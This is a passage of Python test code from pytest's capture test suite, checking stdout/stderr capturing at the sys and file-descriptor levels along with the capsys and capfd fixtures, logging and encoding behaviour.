    """MultiCapture behaviour via sys.stdout/sys.stderr replacement."""

    captureclass = staticmethod(StdCapture)

    @contextlib.contextmanager
    def getcapture(self, **kw):
        # start a capture for the duration of the block, always stopping it
        cap = self.__class__.captureclass(**kw)
        cap.start_capturing()
        try:
            yield cap
        finally:
            cap.stop_capturing()

    def test_capturing_done_simple(self):
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"

    def test_capturing_reset_simple(self):
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
        assert out == "hello world\n"
        assert err == "hello error\n"

    def test_capturing_readouterr(self):
        """readouterr() drains the buffers; later writes are read separately."""
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
            assert out == "hello world\n"
            assert err == "hello error\n"
            sys.stderr.write("error2")
            out, err = cap.readouterr()
        assert err == "error2"

    def test_capture_results_accessible_by_attribute(self):
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            capture_result = cap.readouterr()
        assert capture_result.out == "hello"
        assert capture_result.err == "world"

    def test_capturing_readouterr_unicode(self):
        with self.getcapture() as cap:
            print("hxąć")
            out, err = cap.readouterr()
        assert out == u"hxąć\n"

    @pytest.mark.skipif(
        "sys.version_info >= (3,)", reason="text output different for bytes on python3"
    )
    def test_capturing_readouterr_decode_error_handling(self):
        with self.getcapture() as cap:
            # triggered an internal error in pytest
            print("\xa6")
            out, err = cap.readouterr()
        assert out == u"\ufffd\n"

    def test_reset_twice_error(self):
        """stop_capturing() twice raises; results are still retrievable."""
        with self.getcapture() as cap:
            print("hello")
            out, err = cap.readouterr()
        pytest.raises(ValueError, cap.stop_capturing)
        assert out == "hello\n"
        assert not err

    def test_capturing_modify_sysouterr_in_between(self):
        """Replacing sys.stdout/err inside the block does not disturb the
        capture, and the originals are restored afterwards."""
        oldout = sys.stdout
        olderr = sys.stderr
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            sys.stdout = capture.CaptureIO()
            sys.stderr = capture.CaptureIO()
            print("not seen")
            sys.stderr.write("not seen\n")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"
        assert sys.stdout == oldout
        assert sys.stderr == olderr

    def test_capturing_error_recursive(self):
        """Nested captures each collect only their own output."""
        with self.getcapture() as cap1:
            print("cap1")
            with self.getcapture() as cap2:
                print("cap2")
                out2, err2 = cap2.readouterr()
                out1, err1 = cap1.readouterr()
        assert out1 == "cap1\n"
        assert out2 == "cap2\n"

    def test_just_out_capture(self):
        with self.getcapture(out=True, err=False) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert not err

    def test_just_err_capture(self):
        with self.getcapture(out=False, err=True) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert err == "world"
        assert not out

    def test_stdin_restored(self):
        old = sys.stdin
        with self.getcapture(in_=True):
            newstdin = sys.stdin
        assert newstdin != sys.stdin
        assert sys.stdin is old

    def test_stdin_nulled_by_default(self):
        print("XXX this test may well hang instead of crashing")
        print("XXX which indicates an error in the underlying capturing")
        print("XXX mechanisms")
        with self.getcapture():
            pytest.raises(IOError, sys.stdin.read)
class TestStdCaptureFD(TestStdCapture):
    """Re-runs all TestStdCapture cases with the FD-based implementation,
    plus FD-specific checks."""

    pytestmark = needsosdup
    captureclass = staticmethod(StdCaptureFD)

    def test_simple_only_fd(self, testdir):
        """Raw os.write() output is captured in FD mode."""
        testdir.makepyfile(
            """
            import os

            def test_x():
                os.write(1, "hello\\n".encode("ascii"))
                assert 0
            """
        )
        result = testdir.runpytest_subprocess()
        result.stdout.fnmatch_lines(
            """
            *test_x*
            *assert 0*
            *Captured stdout*
            """
        )

    def test_intermingling(self):
        """fd-level writes and sys-level writes are interleaved in order."""
        with self.getcapture() as cap:
            os.write(1, b"1")
            sys.stdout.write(str(2))
            sys.stdout.flush()
            os.write(1, b"3")
            os.write(2, b"a")
            sys.stderr.write("b")
            sys.stderr.flush()
            os.write(2, b"c")
            out, err = cap.readouterr()
        assert out == "123"
        assert err == "abc"

    def test_many(self, capfd):
        """Repeated start/stop cycles must not leak open files."""
        with lsof_check():
            for i in range(10):
                cap = StdCaptureFD()
                cap.stop_capturing()
class TestStdCaptureFDinvalidFD(object):
    """FD capturing must cope with already-closed standard descriptors."""

    pytestmark = needsosdup

    def test_stdcapture_fd_invalid_fd(self, testdir):
        testdir.makepyfile(
            """
            import os
            from _pytest import capture

            def StdCaptureFD(out=True, err=True, in_=True):
                return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)

            def test_stdout():
                os.close(1)
                cap = StdCaptureFD(out=True, err=False, in_=False)
                assert repr(cap.out) == "<FDCapture 1 oldfd=None _state=None>"
                cap.stop_capturing()

            def test_stderr():
                os.close(2)
                cap = StdCaptureFD(out=False, err=True, in_=False)
                assert repr(cap.err) == "<FDCapture 2 oldfd=None _state=None>"
                cap.stop_capturing()

            def test_stdin():
                os.close(0)
                cap = StdCaptureFD(out=False, err=False, in_=True)
                assert repr(cap.in_) == "<FDCapture 0 oldfd=None _state=None>"
                cap.stop_capturing()
            """
        )
        result = testdir.runpytest_subprocess("--capture=fd")
        assert result.ret == 0
        assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
    # stop_capturing() before start_capturing() must be a harmless no-op
    capsys = StdCapture()
    capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
    """sys.stdout.encoding must be usable while capsys is active."""
    test_text = "test text"
    print(test_text.encode(sys.stdout.encoding, "replace"))
    (out, err) = capsys.readouterr()
    assert out
    assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
    """readouterr() returns a named tuple with .out and .err attributes."""
    sys.stdout.write("spam")
    sys.stderr.write("eggs")
    capture_result = capsys.readouterr()
    assert capture_result.out == "spam"
    assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
    """readouterr() must keep using the same tmpfile, whether the capture
    was created with an explicit file or with the default (True)."""
    if not use:
        tmpfile = True
    cap = StdCaptureFD(out=False, err=tmpfile)
    try:
        cap.start_capturing()
        capfile = cap.err.tmpfile
        cap.readouterr()
    finally:
        cap.stop_capturing()
    capfile2 = cap.err.tmpfile
    assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
    """Capturing must still work for a later test after an earlier test
    closed fd 1."""
    testdir.makepyfile(
        """
        import os

        def test_close():
            os.close(1)

        def test_capture_again():
            os.write(1, b"hello\\n")
            assert 0
        """
    )
    result = testdir.runpytest_subprocess()
    result.stdout.fnmatch_lines(
        """
        *test_capture_again*
        *assert 0*
        *stdout*
        *hello*
        """
    )
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
    """Check that stdlib logging interacts correctly with both low-level
    capture implementations: captured warnings are read by readouterr(),
    popped output goes back to the original stream, and nothing leaks
    through atexit."""
    # Fix: the guard previously compared against "StdCaptureFD", which is
    # never one of the parametrized values, so the skip could not fire and
    # the FDCapture case would fail (instead of skip) without os.dup.
    if method == "FDCapture" and not hasattr(os, "dup"):
        pytest.skip("need os.dup")
    # here we check a fundamental feature
    p = testdir.makepyfile(
        """
        import sys, os
        import py, logging
        from _pytest import capture
        cap = capture.MultiCapture(out=False, in_=False,
                                   Capture=capture.%s)
        cap.start_capturing()
        logging.warning("hello1")
        outerr = cap.readouterr()
        print("suspend, captured %%s" %%(outerr,))
        logging.warning("hello2")
        cap.pop_outerr_to_orig()
        logging.warning("hello3")
        outerr = cap.readouterr()
        print("suspend2, captured %%s" %% (outerr,))
        """
        % (method,)
    )
    result = testdir.runpython(p)
    result.stdout.fnmatch_lines(
        """
        suspend, captured*hello1*
        suspend2, captured*WARNING:root:hello3*
        """
    )
    result.stderr.fnmatch_lines(
        """
        WARNING:root:hello2
        """
    )
    assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
    """Captured sys.stdout/stderr expose an .errors attribute (#555)."""
    testdir.makepyfile(
        """
        import sys

        def test_capattr():
            assert sys.stdout.errors == "strict"
            assert sys.stderr.errors == "strict"
        """
    )
    reprec = testdir.inline_run()
    reprec.assertoutcome(passed=1)
# Fix: the previous condition `not win and py>=3.6` contradicted its own
# reason string — it ran the test on non-Windows py<3.6 and on Windows
# py<3.6, and skipped only non-Windows py3.6+.  The workaround under test
# is specific to py3.6+ on Windows, so skip everywhere else.
@pytest.mark.skipif(
    not (sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6)),
    reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
    """
    Ensure _py36_windowsconsoleio_workaround function works with objects that
    do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
    """
    from _pytest.capture import _py36_windowsconsoleio_workaround

    class DummyStream(object):
        def write(self, s):
            pass

    stream = DummyStream()
    _py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
    """Captured streams must expose an .encoding attribute."""
    testdir.makepyfile(
        """
        import sys

        def test_capattr():
            # should not raise AttributeError
            assert sys.stdout.encoding
            assert sys.stderr.encoding
        """
    )
    reprec = testdir.inline_run()
    reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
    """A daemon thread still flushing sys.stderr while the capture tmpfile
    is being closed must not crash the run."""
    p = testdir.makepyfile(
        """
        from __future__ import print_function
        import threading
        import sys

        printing = threading.Event()

        def spam():
            f = sys.stderr
            print('SPAMBEFORE', end='', file=f)
            printing.set()
            while True:
                try:
                    f.flush()
                except (OSError, ValueError):
                    break

        def test_spam_in_thread():
            t = threading.Thread(target=spam)
            t.daemon = True
            t.start()
            printing.wait()
        """
    )
    result = testdir.runpytest_subprocess(str(p))
    assert result.ret == 0
    assert result.stderr.str() == ""
    assert "IOError" not in result.stdout.str()
def test_pickling_and_unpickling_encoded_file():
    # See https://bitbucket.org/pytest-dev/pytest/pull-request/194
    # pickle.loads() raises infinite recursion if
    # EncodedFile.__getattr__ is not implemented properly
    ef = capture.EncodedFile(None, None)
    ef_as_str = pickle.dumps(ef)
    pickle.loads(ef_as_str)
def test_global_capture_with_live_logging(testdir):
    # Issue 3819
    # capture should work with live cli logging
    # Teardown report seems to have the capture for the whole process (setup, capture, teardown)
    testdir.makeconftest(
        """
        def pytest_runtest_logreport(report):
            if "test_global" in report.nodeid:
                if report.when == "teardown":
                    with open("caplog", "w") as f:
                        f.write(report.caplog)
                    with open("capstdout", "w") as f:
                        f.write(report.capstdout)
        """
    )
    testdir.makepyfile(
        """
        import logging
        import sys
        import pytest

        logger = logging.getLogger(__name__)

        @pytest.fixture
        def fix1():
            print("fix setup")
            logging.info("fix setup")
            yield
            logging.info("fix teardown")
            print("fix teardown")

        def test_global(fix1):
            print("begin test")
            logging.info("something in test")
            print("end test")
        """
    )
    result = testdir.runpytest_subprocess("--log-cli-level=INFO")
    assert result.ret == 0

    # the report must carry the log records of all phases...
    with open("caplog", "r") as f:
        caplog = f.read()

    assert "fix setup" in caplog
    assert "something in test" in caplog
    assert "fix teardown" in caplog

    # ...and likewise the captured stdout of all phases
    with open("capstdout", "r") as f:
        capstdout = f.read()

    assert "fix setup" in capstdout
    assert "begin test" in capstdout
    assert "end test" in capstdout
    assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
    # Issue 3819
    # capture should work with live cli logging
    testdir.makepyfile(
        """
        import logging
        import sys

        logger = logging.getLogger(__name__)

        def test_capture({0}):
            print("hello")
            sys.stderr.write("world\\n")
            captured = {0}.readouterr()
            assert captured.out == "hello\\n"
            assert captured.err == "world\\n"

            logging.info("something")
            print("next")
            logging.info("something")

            captured = {0}.readouterr()
            assert captured.out == "next\\n"
        """.format(
            capture_fixture
        )
    )
    result = testdir.runpytest_subprocess("--log-cli-level=INFO")
    assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
    """It should behave the same with and without output capturing (#4861)."""
    p = testdir.makepyfile(
        """
        def test_fails():
            import sys
            sys.stdout.write(b"foo")
        """
    )
    result_without_capture = testdir.runpytest("-s", str(p))

    result_with_capture = testdir.runpytest(str(p))

    assert result_with_capture.ret == result_without_capture.ret

    if _PY3:
        result_with_capture.stdout.fnmatch_lines(
            ["E           TypeError: write() argument must be str, not bytes"]
        )
    else:
        # py2 silently accepts bytes on a text stream
        assert result_with_capture.ret == 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.